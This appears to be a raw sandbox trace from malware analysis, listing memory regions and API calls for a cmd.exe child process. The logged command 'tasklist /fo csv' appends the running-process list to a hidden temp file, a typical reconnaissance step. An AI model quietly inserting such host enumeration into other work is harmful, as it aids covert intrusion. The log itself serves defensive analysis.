os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000da1c" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Thread:
id = 130
os_tid = 0xc34
Thread:
id = 131
os_tid = 0xae8
Thread:
id = 132
os_tid = 0x288
Thread:
id = 133
os_tid = 0x6d8
Thread:
id = 134
os_tid = 0x6f8
Thread:
id = 135
os_tid = 0x61c
Process:
id = "23"
image_name = "cmd.exe"
filename = "c:\\windows\\system32\\cmd.exe"
page_root = "0x2c979000"
os_pid = "0xdb8"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "17"
os_parent_pid = "0x424"
cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c tasklist /fo csv >> C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 3132
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 3133
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 3134
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 3135
start_va = 0x210000
end_va = 0x30ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 3136
start_va = 0x4a1d0000
end_va = 0x4a228fff
monitored = 1
entry_point = 0x4a1d90b4
region_type = mapped_file
name = "cmd.exe"
filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")
Region:
id = 3137
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 3138
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 3139
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 3140
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 3141
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 3142
start_va = 0x7fffffd9000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 3143
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 3144
start_va = 0x50000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 3145
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 3146
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 3147
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 3148
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 3149
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 3150
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 3151
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 3152
start_va = 0x110000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 3153
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 3154
start_va = 0x7fefb8b0000
end_va = 0x7fefb8b7fff
monitored = 0
entry_point = 0x7fefb8b11a0
region_type = mapped_file
name = "winbrand.dll"
filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll")
Region:
id = 3155
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 3156
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 3157
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 3158
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 3159
start_va = 0x310000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000310000"
filename = ""
Region:
id = 3160
start_va = 0x310000
end_va = 0x40ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000310000"
filename = ""
Region:
id = 3161
start_va = 0x4d0000
end_va = 0x4dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004d0000"
filename = ""
Region:
id = 3162
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3163
start_va = 0x4e0000
end_va = 0x667fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004e0000"
filename = ""
Region:
id = 3164
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3165
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3166
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 3167
start_va = 0x670000
end_va = 0x7f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000670000"
filename = ""
Region:
id = 3168
start_va = 0x800000
end_va = 0x1bfffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000800000"
filename = ""
Region:
id = 3169
start_va = 0xc0000
end_va = 0xdffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "cmd.exe.mui"
filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")
Region:
id = 3170
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 3171
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 3172
start_va = 0x1c00000
end_va = 0x1ecefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Thread:
id = 142
os_tid = 0xe18
[0410.133] GetProcAddress (hModule=0x77660000, lpProcName="SetConsoleInputExeNameW") returned 0x77670c80
[0410.134] GetProcessHeap () returned 0x110000
[0410.134] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x4012) returned 0x12aff0
[0410.134] GetProcessHeap () returned 0x110000
[0410.134] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12aff0 | out: hHeap=0x110000) returned 1
[0410.137] _wcsicmp (_String1="tasklist", _String2=")") returned 75
[0410.137] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14
[0410.137] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14
[0410.137] _wcsicmp (_String1="IF", _String2="tasklist") returned -11
[0410.137] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11
[0410.153] _wcsicmp (_String1="REM", _String2="tasklist") returned -2
[0410.153] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2
[0410.153] GetProcessHeap () returned 0x110000
[0410.153] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xb0) returned 0x129e40
[0410.153] GetProcessHeap () returned 0x110000
[0410.153] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x22) returned 0x124760
[0410.154] GetProcessHeap () returned 0x110000
[0410.154] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x24) returned 0x124790
[0410.154] GetProcessHeap () returned 0x110000
[0410.154] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x38) returned 0x1267b0
[0410.163] GetProcessHeap () returned 0x110000
[0410.163] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x6a) returned 0x129f00
[0410.165] GetProcessHeap () returned 0x110000
[0410.165] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x28) returned 0x1247c0
[0410.165] _get_osfhandle (_FileHandle=1) returned 0x7
[0410.166] _get_osfhandle (_FileHandle=1) returned 0x7
[0410.166] _get_osfhandle (_FileHandle=1) returned 0x7
[0410.166] GetFileType (hFile=0x7) returned 0x2
[0410.167] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0410.167] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f4d8 | out: lpMode=0x30f4d8) returned 1
[0410.168] _dup (_FileHandle=1) returned 3
[0410.169] _close (_FileHandle=1) returned 0
[0410.170] _wcsicmp (_String1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", _String2="con") returned -53
[0410.170] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x30f488, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54
[0410.170] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 1
[0410.171] _get_osfhandle (_FileHandle=1) returned 0x54
[0410.171] GetFileType (hFile=0x54) returned 0x1
[0410.171] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x41
[0410.171] SetFilePointer (in: hFile=0x54, lDistanceToMove=-1, lpDistanceToMoveHigh=0x30f4e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x30f4e8*=0) returned 0x40
[0410.171] ReadFile (in: hFile=0x54, lpBuffer=0x30f4d8, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x30f480, lpOverlapped=0x0 | out: lpBuffer=0x30f4d8*, lpNumberOfBytesRead=0x30f480*=0x1, lpOverlapped=0x0) returned 1
[0410.173] GetConsoleTitleW (in: lpConsoleTitle=0x30f510, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0410.175] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16
[0410.175] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15
[0410.175] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16
[0410.175] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24
[0410.175] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17
[0410.175] _wcsicmp (_String1="tasklist", _String2="CD") returned 17
[0410.175] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17
[0410.175] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2
[0410.175] _wcsicmp (_String1="tasklist", _String2="REN") returned 2
[0410.175] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15
[0410.175] _wcsicmp (_String1="tasklist", _String2="SET") returned 1
[0410.175] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4
[0410.176] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16
[0410.176] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8
[0410.176] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4
[0410.176] _wcsicmp (_String1="tasklist", _String2="MD") returned 7
[0410.176] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7
[0410.176] _wcsicmp (_String1="tasklist", _String2="RD") returned 2
[0410.176] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2
[0410.176] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4
[0410.176] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13
[0410.176] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1
[0410.176] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17
[0410.176] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17
[0410.176] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2
[0410.176] _wcsicmp (_String1="tasklist", _String2="VER") returned -2
[0410.176] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2
[0410.176] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15
[0410.177] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1
[0410.177] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15
[0410.177] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8
[0410.177] _wcsicmp (_String1="tasklist", _String2="START") returned 1
[0410.177] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16
[0410.177] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9
[0410.177] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7
[0410.177] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4
[0410.177] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4
[0410.177] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19
[0410.177] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14
[0410.177] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18
[0410.177] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17
[0410.177] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7
[0410.177] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16
[0410.177] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15
[0410.178] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16
[0410.178] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24
[0410.178] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17
[0410.178] _wcsicmp (_String1="tasklist", _String2="CD") returned 17
[0410.178] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17
[0410.178] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2
[0410.178] _wcsicmp (_String1="tasklist", _String2="REN") returned 2
[0410.178] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15
[0410.178] _wcsicmp (_String1="tasklist", _String2="SET") returned 1
[0410.178] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4
[0410.178] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16
[0410.178] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8
[0410.178] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4
[0410.178] _wcsicmp (_String1="tasklist", _String2="MD") returned 7
[0410.178] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7
[0410.178] _wcsicmp (_String1="tasklist", _String2="RD") returned 2
[0410.179] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2
[0410.179] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4
[0410.179] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13
[0410.179] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1
[0410.179] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17
[0410.179] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17
[0410.179] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2
[0410.179] _wcsicmp (_String1="tasklist", _String2="VER") returned -2
[0410.179] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2
[0410.179] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15
[0410.179] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1
[0410.179] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15
[0410.179] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8
[0410.179] _wcsicmp (_String1="tasklist", _String2="START") returned 1
[0410.179] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16
[0410.179] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9
[0410.180] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7
[0410.180] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4
[0410.180] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4
[0410.180] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19
[0410.180] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14
[0410.180] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18
[0410.180] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17
[0410.180] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7
[0410.180] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14
[0410.180] _wcsicmp (_String1="tasklist", _String2="IF") returned 11
[0410.180] _wcsicmp (_String1="tasklist", _String2="REM") returned 2
[0410.181] GetProcessHeap () returned 0x110000
[0410.181] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x218) returned 0x129f80
[0410.181] GetProcessHeap () returned 0x110000
[0410.181] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x36) returned 0x126870
[0410.182] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17
[0410.182] GetProcessHeap () returned 0x110000
[0410.183] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x420) returned 0x12aff0
[0410.183] SetErrorMode (uMode=0x0) returned 0x0
[0410.183] SetErrorMode (uMode=0x1) returned 0x0
[0410.183] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x12b000, lpFilePart=0x30eda0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x30eda0*="system32") returned 0x13
[0410.183] SetErrorMode (uMode=0x0) returned 0x1
[0410.183] GetProcessHeap () returned 0x110000
[0410.183] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x12aff0, Size=0x4a) returned 0x12aff0
[0410.184] GetProcessHeap () returned 0x110000
[0410.184] RtlSizeHeap (HeapHandle=0x110000, Flags=0x0, MemoryPointer=0x12aff0) returned 0x4a
[0410.184] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1ff360, nSize=0x2000 | out: lpBuffer="") returned 0xc8
[0410.184] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0410.184] GetProcessHeap () returned 0x110000
[0410.184] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x1ce) returned 0x12a1a0
[0410.184] GetProcessHeap () returned 0x110000
[0410.184] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x38c) returned 0x12b050
[0410.197] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1ff360, nSize=0x2000 | out: lpBuffer="") returned 0x35
[0410.197] GetProcessHeap () returned 0x110000
[0410.197] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xe8) returned 0x12a380
[0410.200] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0410.200] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*" (normalized: "c:\\windows\\system32\\tasklist.*"), fInfoLevelId=0x1, lpFindFileData=0x30eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb10) returned 0x12a410
[0410.200] GetProcessHeap () returned 0x110000
[0410.200] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x1247f0
[0410.200] FindClose (in: hFindFile=0x12a410 | out: hFindFile=0x12a410) returned 1
[0410.201] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM" (normalized: "c:\\windows\\system32\\tasklist.com"), fInfoLevelId=0x1, lpFindFileData=0x30eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb10) returned 0xffffffffffffffff
[0410.201] GetLastError () returned 0x2
[0410.201] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE" (normalized: "c:\\windows\\system32\\tasklist.exe"), fInfoLevelId=0x1, lpFindFileData=0x30eb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eb10) returned 0x12a410
[0410.201] GetProcessHeap () returned 0x110000
[0410.201] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x1247f0, Size=0x8) returned 0x128620
[0410.202] FindClose (in: hFindFile=0x12a410 | out: hFindFile=0x12a410) returned 1
[0410.202] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
[0410.202] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
[0410.202] GetConsoleTitleW (in: lpConsoleTitle=0x30f060, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0410.208] InitializeProcThreadAttributeList (in: lpAttributeList=0x30ee18, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30edd8 | out: lpAttributeList=0x30ee18, lpSize=0x30edd8) returned 1
[0410.208] UpdateProcThreadAttribute (in: lpAttributeList=0x30ee18, dwFlags=0x0, Attribute=0x60001, lpValue=0x30edc8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30ee18, lpPreviousValue=0x0) returned 1
[0410.208] GetStartupInfoW (in: lpStartupInfo=0x30ef30 | out: lpStartupInfo=0x30ef30*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0410.208] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1
[0410.211] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist /fo csv ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x30ee50*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="tasklist /fo csv ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30ee00 | out: lpCommandLine="tasklist /fo csv ", lpProcessInformation=0x30ee00*(hProcess=0x5c, hThread=0x58, dwProcessId=0xe68, dwThreadId=0xec0)) returned 1
[0410.246] CloseHandle (hObject=0x58) returned 1
[0410.247] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0410.247] GetProcessHeap () returned 0x110000
[0410.247] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x128f90 | out: hHeap=0x110000) returned 1
[0410.247] GetEnvironmentStringsW () returned 0x128f90*
[0410.247] GetProcessHeap () returned 0x110000
[0410.247] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xb78) returned 0x12b610
[0410.247] memcpy (in: _Dst=0x12b610, _Src=0x128f90, _Size=0xb78 | out: _Dst=0x12b610) returned 0x12b610
[0410.247] FreeEnvironmentStringsW (penv=0x128f90) returned 1
[0410.247] WaitForSingleObject (hHandle=0x5c, dwMilliseconds=0xffffffff) returned 0x0
[0417.893] GetExitCodeProcess (in: hProcess=0x5c, lpExitCode=0x30ed48 | out: lpExitCode=0x30ed48*=0x0) returned 1
[0417.894] CloseHandle (hObject=0x5c) returned 1
[0417.894] _vsnwprintf (in: _Buffer=0x30efb8, _BufferCount=0x13, _Format="%08X", _ArgList=0x30ed58 | out: _Buffer="00000000") returned 8
[0417.894] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1
[0417.895] GetProcessHeap () returned 0x110000
[0417.895] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12b610 | out: hHeap=0x110000) returned 1
[0417.895] GetEnvironmentStringsW () returned 0x12cd40*
[0417.895] GetProcessHeap () returned 0x110000
[0417.895] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xb9e) returned 0x12d8f0
[0417.895] memcpy (in: _Dst=0x12d8f0, _Src=0x12cd40, _Size=0xb9e | out: _Dst=0x12d8f0) returned 0x12d8f0
[0417.895] FreeEnvironmentStringsW (penv=0x12cd40) returned 1
[0417.895] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
[0417.895] GetProcessHeap () returned 0x110000
[0417.896] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d8f0 | out: hHeap=0x110000) returned 1
[0417.896] GetEnvironmentStringsW () returned 0x12cd40*
[0417.896] GetProcessHeap () returned 0x110000
[0417.896] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0xb9e) returned 0x12d8f0
